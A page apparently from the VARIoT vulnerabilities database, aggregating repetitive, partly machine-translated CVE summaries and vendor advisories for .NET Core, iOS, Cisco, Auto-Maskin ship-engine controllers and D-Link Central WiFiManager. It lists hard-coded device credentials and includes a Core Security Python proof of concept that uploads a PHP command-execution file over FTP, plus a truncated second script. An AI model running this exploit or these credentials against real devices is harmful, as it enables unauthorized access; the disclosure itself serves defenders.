VARIoT IoT vulnerabilities database

An information disclosure vulnerability exists in .NET Core when authentication information is inadvertently exposed in a redirect, aka ".NET Core Information Disclosure Vulnerability." This affects .NET Core 2.1, .NET Core 1.0, .NET Core 1.1, PowerShell Core 6.0. An attacker can exploit this issue to obtain sensitive information. Successful exploits will lead to other attacks. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 ===================================================================== Red Hat Security Advisory Synopsis: Moderate: .NET Core on Red Hat Enterprise Linux security update Advisory ID: RHSA-2018:2902-01 Product: .NET Core on Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2018:2902 Issue date: 2018-10-09 CVE Names: CVE-2018-8292 ===================================================================== 1. Summary: Updates for rh-dotnetcore11-dotnetcore, and rh-dotnetcore10-dotnetcore are now available for .NET Core on Red Hat Enterprise Linux. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. 2. Relevant releases/architectures: .NET Core on Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64 .NET Core on Red Hat Enterprise Linux Server (v. 7) - x86_64 .NET Core on Red Hat Enterprise Linux Workstation (v. 7) - x86_64 3. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation. These versions correspond to the October 2018 security release by .NET Core upstream projects. 4. Solution: For details on how to apply this update, which includes the changes described in this advisory, refer to: https://access.redhat.com/articles/11258 5. Package List: .NET Core on Red Hat Enterprise Linux ComputeNode (v. 7): Source: rh-dotnetcore10-dotnetcore-1.0.13-1.el7.src.rpm x86_64: rh-dotnetcore10-dotnetcore-1.0.13-1.el7.x86_64.rpm rh-dotnetcore10-dotnetcore-debuginfo-1.0.13-1.el7.x86_64.rpm .NET Core on Red Hat Enterprise Linux ComputeNode (v. 7): Source: rh-dotnetcore11-dotnetcore-1.1.10-1.el7.src.rpm x86_64: rh-dotnetcore11-dotnetcore-1.1.10-1.el7.x86_64.rpm rh-dotnetcore11-dotnetcore-debuginfo-1.1.10-1.el7.x86_64.rpm .NET Core on Red Hat Enterprise Linux Server (v. 7): Source: rh-dotnetcore10-dotnetcore-1.0.13-1.el7.src.rpm x86_64: rh-dotnetcore10-dotnetcore-1.0.13-1.el7.x86_64.rpm rh-dotnetcore10-dotnetcore-debuginfo-1.0.13-1.el7.x86_64.rpm .NET Core on Red Hat Enterprise Linux Server (v. 7): Source: rh-dotnetcore11-dotnetcore-1.1.10-1.el7.src.rpm x86_64: rh-dotnetcore11-dotnetcore-1.1.10-1.el7.x86_64.rpm rh-dotnetcore11-dotnetcore-debuginfo-1.1.10-1.el7.x86_64.rpm .NET Core on Red Hat Enterprise Linux Workstation (v. 7): Source: rh-dotnetcore10-dotnetcore-1.0.13-1.el7.src.rpm x86_64: rh-dotnetcore10-dotnetcore-1.0.13-1.el7.x86_64.rpm rh-dotnetcore10-dotnetcore-debuginfo-1.0.13-1.el7.x86_64.rpm .NET Core on Red Hat Enterprise Linux Workstation (v. 7): Source: rh-dotnetcore11-dotnetcore-1.1.10-1.el7.src.rpm x86_64: rh-dotnetcore11-dotnetcore-1.1.10-1.el7.x86_64.rpm rh-dotnetcore11-dotnetcore-debuginfo-1.1.10-1.el7.x86_64.rpm These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/ 7. References: https://access.redhat.com/security/cve/CVE-2018-8292 https://access.redhat.com/security/updates/classification/#moderate https://github.com/dotnet/announcements/issues/88 8. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2018 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQIVAwUBW71EydzjgjWX9erEAQhK3Q/8DwPo83R6HBwUmO2gO56n0ci7BOOZ1HfH VYRSvXSPaBf8fbFSaZN5+OJhPBJfnCiEIgO8cSuMYf3zWebkIONZnkzB55BJqD0N Z7wS2R4bI6Mw33K9ET2WhoUF7JiZDU+Spu7T2TW9roAms7U7IJBXMi52N3pAS3yQ gzvB8Fuci3xsGqyIYMgt0SmqnlkqbZmR35Yq7e3yxMzAlY/lp7tfQ/ZxIHfxDKh3 NrT8nKj58i0WGlOKxlWsTDadHwrCe9YoZVn8FRJJdCDE+tjW6KNmXKOy08qPfp3n LuikowCnqyQh6CoKJ91q47zsq7j8hisj0z7CgMLxO2Y4Gk9hSni5ynlxlDUYWDrB f9mi4LlnBp1Dwjnv7IJee9SXR4M7fIuwbexhBv8OGzijwXvHZkfZ5aceTAqrBYIb INZNaHwGQIgwkHkanz3N6pPbrfXTvOfcIWmrctyYfI05RsW4FRXm1dh2tF7y1uK7 FgWNvDxAAZqYhk2SBYPtUfQNkNktkLZ0M76QEXcgCrYr5OTTCM92pxZjLPmbYx2Y +1Kl+cSvk3nschXLbuXjGtWiuBrJXtdDW8ytt2bC5lyxylo8mYSl7G5V0eDifMKs sdHtMLM5S+4xrAQ4avNEFgqz4h78s6mY4Dq9fXkZUbYXLFLbaIb/foGUnnWJ5/az 9K+HIBmUA6I= =+FXG -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce

Under some circumstances on BIG-IP 12.0.0-12.1.0, 11.6.0-11.6.1, or 11.4.0-11.5.4 HF1, the Traffic Management Microkernel (TMM) may not properly clean-up pool member network connections when using SPDY or HTTP/2 virtual server profiles. BIG-IP Contains an input validation vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. F5 BIG-IP is an all-in-one network device integrated with network traffic management, application security management, load balancing and other functions from F5 Corporation of the United States. Attackers can exploit this vulnerability to cause service interruption. The following versions are affected: F5 BIG-IP version 12.0.0 to 12.1.0, 11.6.0 to 11.6.1, 11.4.0 to 11.5.4 HF1

A lock screen issue allowed access to photos and contacts on a locked device. This issue was addressed by restricting options offered on a locked device. This issue affected versions prior to iOS 12.0.1. Apple Has released an update for each product.The expected impact depends on each vulnerability, but can be affected as follows: * Service operation interruption (DoS) * Arbitrary code execution * Script execution * information leak * Access restriction avoidance. Apple iOS is prone to multiple local information-disclosure vulnerabilities. Attackers can exploit these issues to obtain sensitive information that may aid in launching further attacks. VoiceOver is one of the voice assistant components. CVE-2018-4380: videosdebarraquito Quick Look Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A local attacker may be able to share items from the lock screen Description: A lock screen issue allowed access to the share function on a locked device. CVE-2018-4379: videosdebarraquito Installation note: This update is available through iTunes and Software Update on your iOS device, and will not appear in your computer's Software Update application, or in the Apple Downloads site. Make sure you have an Internet connection and have installed the latest version of iTunes from https://www.apple.com/itunes/ iTunes and Software Update on the device will automatically check Apple's update server on its weekly schedule. When an update is detected, it is downloaded and the option to be installed is presented to the user when the iOS device is docked. We recommend applying the update immediately if possible. Selecting Don't Install will present the option the next time you connect your iOS device. The automatic update process may take up to a week depending on the day that iTunes or the device checks for updates. You may manually obtain the update via the Check for Updates button within iTunes, or the Software Update on your device. To check that the iPhone, iPod touch, or iPad has been updated: * Navigate to Settings * Select General * Select About. Information will also be posted to the Apple Security Updates web site: https://support.apple.com/kb/HT201222 This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEEDNXJVNCJJEAVmJdZeC9tht7TK3EFAlu7i3gACgkQeC9tht7T K3H2lQ/+Kvfxyl73DfM5KcArmL8+hukFZBG5hM6w/N0Y+5GLME6FYCsk0BRXJ+tm FBTgLDnWzjOiPRAjns5qonHHaSRGJzBFwNt1O23qfRZKS3uVtsRCqFXfrL48irgH S4nw85vfcbpgsb7r7Lka5uw/yQ2XjDTlp3CFNYJEPT+YA7QmBpOwKu4OwwbNJIRo HtlzkdnFaSYTFMKaZgYE8ykUEUYBGW0MwXh8M+tT+gZKfCIc4fUDqjI2HZLANZ4x cM7vgn2+tnjnSOOm9C0/xnzh9nEGA+/JoF+pZW2HQpg7mH30ssMyaHUkCCriKRgw k7PArRTAWBmZknJrdbk21w8ohNbArF/0TmU+yehQ2NuoAVQEdPSaEIMVvwXoRSn5 x+phJ0mLdSXpwFhJLo6rbHGCcd8aY0qt+N//AL65kBDDDt81R8vf0DGo8asBAOX9 w/D2n2ymZF3OJ1jgxX5rYPRKtmuk0iJRskGPe5gbXunCbDW9y5FTpzk0k48pjmk4 ibxlXo0mEo/W+RPIDezoFXrbFSJrAlrZy42KC8kJ3Qd+hnhOWb3yNxAx/bHrkNQd xRyG7SVpd8S5BhPAAb5qcy56z96/EsXLbE5RF9HiWVm+WCJPoprW1W/eWzdhmsFJ pPr4OwkUQ26ua8jPC1zg8HIW0ohDsinnPphJiynez8c0EE4UyXw= =yoiM -----END PGP SIGNATURE-----

A lock screen issue allowed access to the share function on a locked device. This issue was addressed by restricting options offered on a locked device. This issue affected versions prior to iOS 12.0.1. Apple Has released an update for each product.The expected impact depends on each vulnerability, but can be affected as follows: * Service operation interruption (DoS) * Arbitrary code execution * Script execution * information leak * Access restriction avoidance. Apple iOS is prone to multiple local information-disclosure vulnerabilities. Attackers can exploit these issues to obtain sensitive information that may aid in launching further attacks. Quick Look is one of the components used to view common resource files. An information disclosure vulnerability exists in the Quick Look component of Apple iOS prior to 12.0.1. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 APPLE-SA-2018-10-08-1 iOS 12.0.1 iOS 12.0.1 is now available and addresses the following: VoiceOver Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A local attacker may be able to view photos and contacts from the lock screen Description: A lock screen issue allowed access to photos and contacts on a locked device. CVE-2018-4379: videosdebarraquito Installation note: This update is available through iTunes and Software Update on your iOS device, and will not appear in your computer's Software Update application, or in the Apple Downloads site. Make sure you have an Internet connection and have installed the latest version of iTunes from https://www.apple.com/itunes/ iTunes and Software Update on the device will automatically check Apple's update server on its weekly schedule. When an update is detected, it is downloaded and the option to be installed is presented to the user when the iOS device is docked. We recommend applying the update immediately if possible. Selecting Don't Install will present the option the next time you connect your iOS device. The automatic update process may take up to a week depending on the day that iTunes or the device checks for updates. You may manually obtain the update via the Check for Updates button within iTunes, or the Software Update on your device. To check that the iPhone, iPod touch, or iPad has been updated: * Navigate to Settings * Select General * Select About. Information will also be posted to the Apple Security Updates web site: https://support.apple.com/kb/HT201222 This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEEDNXJVNCJJEAVmJdZeC9tht7TK3EFAlu7i3gACgkQeC9tht7T K3H2lQ/+Kvfxyl73DfM5KcArmL8+hukFZBG5hM6w/N0Y+5GLME6FYCsk0BRXJ+tm FBTgLDnWzjOiPRAjns5qonHHaSRGJzBFwNt1O23qfRZKS3uVtsRCqFXfrL48irgH S4nw85vfcbpgsb7r7Lka5uw/yQ2XjDTlp3CFNYJEPT+YA7QmBpOwKu4OwwbNJIRo HtlzkdnFaSYTFMKaZgYE8ykUEUYBGW0MwXh8M+tT+gZKfCIc4fUDqjI2HZLANZ4x cM7vgn2+tnjnSOOm9C0/xnzh9nEGA+/JoF+pZW2HQpg7mH30ssMyaHUkCCriKRgw k7PArRTAWBmZknJrdbk21w8ohNbArF/0TmU+yehQ2NuoAVQEdPSaEIMVvwXoRSn5 x+phJ0mLdSXpwFhJLo6rbHGCcd8aY0qt+N//AL65kBDDDt81R8vf0DGo8asBAOX9 w/D2n2ymZF3OJ1jgxX5rYPRKtmuk0iJRskGPe5gbXunCbDW9y5FTpzk0k48pjmk4 ibxlXo0mEo/W+RPIDezoFXrbFSJrAlrZy42KC8kJ3Qd+hnhOWb3yNxAx/bHrkNQd xRyG7SVpd8S5BhPAAb5qcy56z96/EsXLbE5RF9HiWVm+WCJPoprW1W/eWzdhmsFJ pPr4OwkUQ26ua8jPC1zg8HIW0ohDsinnPphJiynez8c0EE4UyXw= =yoiM -----END PGP SIGNATURE-----

contiki-ng version 4 contains a Buffer Overflow vulnerability in AQL (Antelope Query Language) database engine that can result in Attacker can perform Remote Code Execution on device using Contiki-NG operating system. This attack appear to be exploitable via Attacker must be able to run malicious AQL code (e.g. via SQL-like Injection attack). contiki-ng Contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Contiki-NG is an open source cross-platform operating system for the next generation of IoT devices. AQL (Antelope Query Language) database engine is one of the AQL database engines. The AQL database engine in Contiki-NG 4 has a buffer overflow vulnerability

The smart campus platform is a set of smart campus systems developed by Guangdong Zhizhe Internet of Things Technology Co., Ltd. The system involves a number of functional modules such as teaching affairs scheduling, class adjustment, class statistics, teacher leave, student big data management platform, attendance management, logistics equipment management, home-school communication platform and other functional modules. The smart campus platform has an arbitrary user password retrieval vulnerability. The vulnerability stems from a flaw in the authentication mechanism when the user password is reset in the forgot password function. An attacker can use the vulnerability to set a new user password and view student information after obtaining application permissions.

The Auto-Maskin products utilize an undocumented custom protocol to set up Modbus communications with other devices without validating those devices. The originating device sends a message in plaintext, 48:65:6c:6c:6f:20:57:6f:72:6c:64, "Hello World" over UDP ports 44444-44446 to the broadcast address for the LAN. Without verification devices respond to any of these broadcast messages on the LAN with a plaintext reply over UDP containing the device model and firmware version. Following this exchange the devices allow Modbus transmissions between the two devices on the standard Modbus port 502 TCP. Impact: An attacker can exploit this vulnerability to send arbitrary messages to any DCU or RP device through spoofing or replay attacks as long as they have access to the network. Affected releases are Auto-Maskin DCU-210E RP-210E: Versions prior to 3.7 on ARMv7. Auto-Maskin RP With remote panel DCU The control unit is a product that monitors and controls the ship's engine. These products have multiple vulnerabilities related to authentication and encryption that can be accessed by an attacker and take over the engine operation of the ship. Problems with hard-coded credentials (CWE-798) - CVE-2018-5399 DCU 210E No firmware Dropbear SSH server Is included, but this is not documented. Also, SSH The username and password for the connection are hard-coded and the password is easily guessable. Insufficient validation of connection source (CWE-346) - CVE-2018-5400 The product uses a proprietary protocol that is not documented to communicate with other equipment. Modbus We are communicating, but we have not verified the validity of the connection between devices. Sensitive information is sent in clear text (CWE-319) - CVE-2018-5401 The product is not encrypted Modbus Sending control information using communication. Sensitive information is sent in clear text (CWE-319) - CVE-2018-5402 The web server included in the product is an administrator using plain text that is not encrypted. PIN Sending code. These vulnerabilities Brian Satira Mr and Brian Olson Reported by him.An attacker could use this vulnerability to obtain information such as device configuration, configuration information, and sensor operating status. Also any Modbus ( control ) Information may also be sent. Auto-Maskin DCU 210E RP 210E and Marine Pro Observer App are prone to the following security vulnerabilities: 1. An hard-coded credentials security bypass Vulnerability. 2. A security-bypass vulnerability. 3. Multiple information disclosure vulnerabilities. Attackers may exploit these issues to gain unauthorized access to the affected application, or to bypass certain security restrictions to perform unauthorized actions, and obtain sensitive information

The Auto-Maskin DCU 210E, RP-210E, and Marine Pro Observer Android App transmit sensitive or security-critical data in cleartext in a communication channel that can be sniffed by unauthorized actors. The devices transmit process control information via unencrypted Modbus communications. Impact: An attacker can exploit this vulnerability to observe information about configurations, settings, what sensors are present and in use, and other information to aid in crafting spoofed messages. Requires access to the network. Affected releases are Auto-Maskin DCU-210E, RP-210E, and Marine Pro Observer Android App. Versions prior to 3.7 on ARMv7. Auto-Maskin RP With remote panel DCU The control unit is a product that monitors and controls the ship's engine. These products have multiple vulnerabilities related to authentication and encryption that can be accessed by an attacker and take over the engine operation of the ship. Problems with hard-coded credentials (CWE-798) - CVE-2018-5399 DCU 210E No firmware Dropbear SSH server Is included, but this is not documented. Also, SSH The username and password for the connection are hard-coded and the password is easily guessable. Insufficient validation of connection source (CWE-346) - CVE-2018-5400 The product uses a proprietary protocol that is not documented to communicate with other equipment. Modbus We are communicating, but we have not verified the validity of the connection between devices. Sensitive information is sent in clear text (CWE-319) - CVE-2018-5402 The web server included in the product is an administrator using plain text that is not encrypted. PIN Sending code. An hard-coded credentials security bypass Vulnerability. 2. A security-bypass vulnerability. 3. Multiple information disclosure vulnerabilities. Attackers may exploit these issues to gain unauthorized access to the affected application, or to bypass certain security restrictions to perform unauthorized actions, and obtain sensitive information. Auto-Maskin DCU-210E and RP-210E are engine control panels

The Auto-Maskin DCU 210E, RP-210E, and Marine Pro Observer Android App use an embedded webserver that uses unencrypted plaintext for the transmission of the administrator PIN Impact: An attacker once authenticated can change configurations, upload new configuration files, and upload executable code via file upload for firmware updates. Requires access to the network. Affected releases are Auto-Maskin DCU-210E, RP-210E, and the Marine Pro Observer Android App. Versions prior to 3.7 on ARMv7. Auto-Maskin RP With remote panel DCU The control unit is a product that monitors and controls the ship's engine. These products have multiple vulnerabilities related to authentication and encryption that can be accessed by an attacker and take over the engine operation of the ship. Problems with hard-coded credentials (CWE-798) - CVE-2018-5399 DCU 210E No firmware Dropbear SSH server Is included, but this is not documented. Also, SSH The username and password for the connection are hard-coded and the password is easily guessable. Insufficient validation of connection source (CWE-346) - CVE-2018-5400 The product uses a proprietary protocol that is not documented to communicate with other equipment. Modbus We are communicating, but we have not verified the validity of the connection between devices. Sensitive information is sent in clear text (CWE-319) - CVE-2018-5401 The product is not encrypted Modbus Sending control information using communication. Sensitive information is sent in clear text (CWE-319) - CVE-2018-5402 The web server included in the product is an administrator using plain text that is not encrypted. PIN Sending code. These vulnerabilities Brian Satira Mr and Brian Olson Reported by him.An attacker could use this vulnerability to obtain information such as device configuration, configuration information, and sensor operating status. Also any Modbus ( control ) Information may also be sent. An hard-coded credentials security bypass Vulnerability. 2. A security-bypass vulnerability. 3. Multiple information disclosure vulnerabilities. Attackers may exploit these issues to gain unauthorized access to the affected application, or to bypass certain security restrictions to perform unauthorized actions, and obtain sensitive information. Auto-Maskin DCU-210E and RP-210E are engine control panels

The Auto-Maskin DCU 210E firmware contains an undocumented Dropbear SSH server, v2015.55, configured to listen on Port 22 while the DCU is running. The Dropbear server is configured with a hard-coded user name and password combination of root / amroot. The server is configured to use password only authentication not cryptographic keys, however the firmware image contains an RSA host-key for the server. An attacker can exploit this vulnerability to gain root access to the Angstrom Linux operating system and modify any binaries or configuration files in the firmware. Affected releases are Auto-Maskin DCU-210E RP-210E: Versions prior to 3.7 on ARMv7. Auto-Maskin RP With remote panel DCU The control unit is a product that monitors and controls the ship's engine. These products have multiple vulnerabilities related to authentication and encryption that can be accessed by an attacker and take over the engine operation of the ship. Also, SSH The username and password for the connection are hard-coded and the password is easily guessable. Insufficient validation of connection source (CWE-346) - CVE-2018-5400 The product uses a proprietary protocol that is not documented to communicate with other equipment. Modbus We are communicating, but we have not verified the validity of the connection between devices. Sensitive information is sent in clear text (CWE-319) - CVE-2018-5401 The product is not encrypted Modbus Sending control information using communication. Sensitive information is sent in clear text (CWE-319) - CVE-2018-5402 The web server included in the product is an administrator using plain text that is not encrypted. PIN Sending code. These vulnerabilities Brian Satira Mr and Brian Olson Reported by him.An attacker could use this vulnerability to obtain information such as device configuration, configuration information, and sensor operating status. Also any Modbus ( control ) Information may also be sent. Auto-Maskin DCU 210E RP 210E and Marine Pro Observer App are prone to the following security vulnerabilities: 1. An hard-coded credentials security bypass Vulnerability. 2. A security-bypass vulnerability. 3. Multiple information disclosure vulnerabilities. Attackers may exploit these issues to gain unauthorized access to the affected application, or to bypass certain security restrictions to perform unauthorized actions, and obtain sensitive information

A vulnerability in the web-based management interface of Cisco Identity Services Engine (ISE) could allow an authenticated, remote attacker to execute arbitrary commands on the underlying operating system of an affected device with the privileges of the web server. Cisco Identity Services Engine (ISE) Contains an input validation vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Cisco Identity Services Engine (ISE) is an identity-based context-aware platform (ISE Identity Services Engine) from Cisco. The platform monitors the network by collecting real-time information on the network, users and devices, and formulating and implementing corresponding policies. An input validation vulnerability exists in the web-based management interface in Cisco ISE

A vulnerability in the web-based management interface of Cisco Identity Services Engine (ISE) could allow an authenticated, remote attacker to execute arbitrary commands on the underlying operating system of an affected device with the privileges of the web server. Cisco Identity Services Engine (ISE) Contains an input validation vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Cisco Identity Services Engine (ISE) is an identity-based context-aware platform (ISE Identity Services Engine) from Cisco. The platform monitors the network by collecting real-time information on the network, users and devices, and formulating and implementing corresponding policies. An input validation vulnerability exists in the web-based management interface in Cisco ISE

A vulnerability in the implementation of Traffic Flow Confidentiality (TFC) over IPsec functionality in Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause an affected device to restart unexpectedly, resulting in a denial of service (DoS) condition. The vulnerability is due to an error that may occur if the affected software renegotiates the encryption key for an IPsec tunnel when certain TFC traffic is in flight. An attacker could exploit this vulnerability by sending a malicious stream of TFC traffic through an established IPsec tunnel on an affected device. A successful exploit could allow the attacker to cause a daemon process on the affected device to crash, which could cause the device to crash and result in a DoS condition. The former is an operating system running on the firewall. The latter is a unified software suite that provides next-generation firewall services

A vulnerability in the cryptographic hardware accelerator driver of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause an affected device to reload, resulting in a temporary denial of service (DoS) condition. The vulnerability exists because the affected devices have a limited amount of Direct Memory Access (DMA) memory and the affected software improperly handles resources in low-memory conditions. An attacker could exploit this vulnerability by sending a sustained, high rate of malicious traffic to an affected device to exhaust memory on the device. A successful exploit could allow the attacker to exhaust DMA memory on the affected device, which could cause the device to reload and result in a temporary DoS condition. CiscoASA5506-XwithFirePOWERServices are all different series of security devices from Cisco. Both AdaptiveSecurityAppliance(ASA)Software and FirepowerThreatDefense(FTD)Software are used in the operating system. Cisco ASA 5506-X with FirePOWER Services, etc. The following products are affected: Cisco ASA 5506-X with FirePOWER Services; ASA 5506H-X with FirePOWER Services; ASA 5506W-X with FirePOWER Services; ASA 5508-X with FirePOWER Services; ASA 5516-X with FirePOWER Services

A vulnerability in the Sourcefire tunnel control channel protocol in Cisco Firepower System Software running on Cisco Firepower Threat Defense (FTD) sensors could allow an authenticated, local attacker to execute specific CLI commands with root privileges on the Cisco Firepower Management Center (FMC), or through Cisco FMC on other Firepower sensors and devices that are controlled by the same Cisco FMC. To send the commands, the attacker must have root privileges for at least one affected sensor or the Cisco FMC. The vulnerability exists because the affected software performs insufficient checks for certain CLI commands, if the commands are executed via a Sourcefire tunnel connection. An attacker could exploit this vulnerability by authenticating with root privileges to a Firepower sensor or Cisco FMC, and then sending specific CLI commands to the Cisco FMC or through the Cisco FMC to another Firepower sensor via the Sourcefire tunnel connection. A successful exploit could allow the attacker to modify device configurations or delete files on the device that is running Cisco FMC Software or on any Firepower device that is managed by Cisco FMC. Cisco Firepower System The software contains vulnerabilities related to authorization, permissions, and access control.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Cisco Adaptive Security Appliance (ASA) 5500-X Series with FirePOWER Services, etc. are all security devices of Cisco (Cisco). Firepower System Software is a firewall operating system used in it. The following products are affected: Cisco Adaptive Security Appliance (ASA) 5500-X Series with FirePOWER Services; Adaptive Security Appliance (ASA) 5500-X Series Next-Generation Firewalls; FirePOWER 7000 Series Appliances; FirePOWER 8000 Series Appliances; Firepower 4100 Series Security Appliances; Firepower 9300 Series Security Appliances; Firepower Management Center; Firepower Threat Defense; Firepower Threat Defense Virtual (FTDv);

A vulnerability in the web framework code for Cisco RV180W Wireless-N Multifunction VPN Router and Small Business RV Series RV220W Wireless Network Security Firewall could allow an unauthenticated, remote attacker to conduct a directory path traversal attack on a targeted device. The issue is due to improper sanitization of user-supplied input in HTTP request parameters that describe filenames. An attacker could exploit this vulnerability by using directory traversal techniques to submit a path to a desired file location. The Cisco RV180WWireless-NMultifunctionVPNRouter is a versatile VPN router device. A directory traversal vulnerability exists in the CiscoRV180WWireless-NMultifunctionVPNRouterWEB framework. There are currently no detailed details of the vulnerability provided

A vulnerability in the web framework code for Cisco RV180W Wireless-N Multifunction VPN Router and Small Business RV Series RV220W Wireless Network Security Firewall could allow an unauthenticated, remote attacker to execute arbitrary SQL queries. The attacker could retrieve sensitive information which should be restricted. A vulnerability in the web framework code for Cisco RV180W Wireless-N Multifunction VPN Router and Small Business RV Series RV220W Wireless Network Security Firewall could allow an unauthenticated, remote attacker to execute arbitrary SQL queries. The attacker could retrieve sensitive information which should be restricted. The product has entered the end-of-life phase and there will be no more firmware fixes. The Cisco RV180WWireless-NMultifunctionVPNRouter and the SmallBusinessRVSeriesRV220WWirelessNetworkSecurityFirewall are products of Cisco. The Cisco RV180WWireless-NMultifunctionVPNRouter is a router product. SmallBusinessRVSeriesRV220WWirelessNetworkSecurityFirewall is a wireless network firewall product. A security vulnerability exists in the Web framework components in the CiscoRV180WWireless-NMultifunctionVPNRouter and SmallBusinessRVSeriesRV220WWirelessNetworkSecurityFirewall

A vulnerability in the Server Message Block Version 2 (SMBv2) and Version 3 (SMBv3) protocol implementation for the Cisco Firepower System Software could allow an unauthenticated, remote attacker to cause the device to run low on system memory, possibly preventing the device from forwarding traffic. It is also possible that a manual reload of the device may be required to clear the condition. The vulnerability is due to incorrect SMB header validation. An attacker could exploit this vulnerability by sending a custom SMB file transfer through the targeted device. A successful exploit could cause the device to consume an excessive amount of system memory and prevent the SNORT process from forwarding network traffic. This vulnerability can be exploited using either IPv4 or IPv6 in combination with SMBv2 or SMBv3 network traffic. Cisco Firepower System The software contains data processing vulnerabilities.Service operation interruption (DoS) There is a possibility of being put into a state. Cisco Adaptive Security Appliance (ASA) 5500-X Series with FirePOWER Services, etc. are all security devices of Cisco (Cisco). Firepower System Software is a firewall operating system used in it. The following products are affected: Cisco Adaptive Security Appliance (ASA) 5500-X Series with FirePOWER Services; Adaptive Security Appliance (ASA) 5500-X Series Next-Generation Firewalls; Advanced Malware Protection (AMP) for Networks, 7000 Series Appliances; Advanced Malware Protection (AMP) for Networks,

An issue was discovered on D-Link Central WiFi Manager before v 1.03r0100-Beta1. They expose an FTP server that serves by default on port 9000 and has hardcoded credentials (admin, admin). Taking advantage of this, a remote unauthenticated attacker could execute arbitrary PHP code by uploading any file in the web root directory and then accessing it via a request. D-Link Central WiFi Manager Contains a vulnerability related to unlimited uploads of dangerous types of files.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. *Advisory Information* Title: D-Link Central WiFiManager Software Controller Multiple Vulnerabilities Advisory ID: CORE-2018-0010 Advisory URL: http://www.coresecurity.com/advisories/d-link-central-wifimanager-software-controller-multiple-vulnerabilities Date published: 2018-10-04 Date of last update: 2018-10-04 Vendors contacted: D-Link Release mode: Coordinated release 2. *Vulnerability Information* Class: Unrestricted Upload of File with Dangerous Type [CWE-434], Improper Authorization [CWE-285], Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') [CWE-79], Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') [CWE-79] Impact: Code execution Remotely Exploitable: Yes Locally Exploitable: Yes CVE Name: CVE-2018-17440, CVE-2018-17442, CVE-2018-17443, CVE-2018-17441 3. *Vulnerability Description* D-Link's website states that: [1] Central WiFiManager Software Controller helps network administrators streamline their wireless access point (AP) management workflow. Central WiFiManager is an innovative approach to the more traditional hardware-based multiple access point management system. It uses a centralized server to both remotely manage and monitor wireless APs on a network. Vulnerabilities were found in the Central WiFiManager Software Controller, allowing unauthenticated and authenticated file upload with dangerous type that could lead to remote code execution with system permissions. Also, two stored Cross Site Scripting vulnerabilities were found. 4. *Vulnerable Packages* . Central WifiManager v1.03 Other products and versions might be affected, but they were not tested. 5. *Vendor Information, Solutions and Workarounds* D-Link released the following Beta version that addresses the reported vulnerabilities: . Central WifiManager v 1.03r0100-Beta1 In addition, D-Link published a security note in: https://securityadvisories.dlink.com/announcement/publication.aspx?name=SAP10092 6. *Credits* These vulnerabilities were discovered and researched by Julian Munoz from Core Security Consulting Services. The publication of this advisory was coordinated by Leandro Cuozzo from Core Advisories Team. 7. On 7.2 we show a similar attack to but in this case with an authenticated user in the web application. The application has a functionality to upload a .rar file used for the captive portal displayed by the Access Points. We will craft a .rar with a PHP file that we will end up executing in the context of the web application. When the .rar is uploaded is stored in the path "\web\captivalportal" in a folder with a timestamp created by the PHP time() function. In order to know what is the web server's time we request an information file that contains the time we are looking for. After we have the server's time we upload the .rar, calculate the proper epoch and request the appropriate path increasing this epoch by one until we hit the correct one. Finally, we discovered two Cross-Site Scripting, one on the update site functionality, in the 'sitename' parameter (7.3) and the other one on the creation of a local user in the 'username' parameter (7.4). 7.1. /----- import requests from ftplib import FTP #stablish connection with FTP server host_ip = "127.0.0.1" ftp = FTP() ftp.connect(host=host_ip<ftp://ftp.connect(host=host_ip>, port=9000) ftp.login(<ftp://ftp.login(>"admin", "admin") data = [] #create PHP poc file poc_php_file = open("poc.php", "w+") poc_php_file.write("<?php\nsystem('whoami');\n?>") poc_php_file.close() #upload PHP poc file php_file = open("poc.php", "rb") ftp.cwd('/web/public')<ftp://ftp.cwd('/web/public')> ftp.storbinary(<ftp://ftp.storbinary(>"STOR write_file.php", php_file) ftp.dir(data.append)<ftp://ftp.dir(data.append)> ftp.quit()<ftp://ftp.quit()> for line in data: print "-", line session = requests.Session() session.trust_env = False #get the uploaded file for remote code execution get_uploaded_file = session.get('https://127.0.0.1/public/write_file.php', verify=False) print get_uploaded_file.text -----/ 7.2. *Authenticated Remote Code Execution by Unrestricted Upload of File with Dangerous Type* [CVE-2018-17442] In this case we make a file upload using the functionality given by the onUploadLogPic endpoint, that will take a .rar file, decompress it and store it in a folder named after the PHP time() function. Our goal is first obtain the server's time, upload a .rar with our PHP file, calculate the proper epoch and iterate increasing it until we hit the proper one and remote code execution is achieved. /----- import re import time import requests import datetime import tarfile def parse_to_datetime(date_string): date_list = date_string.split("-") td = 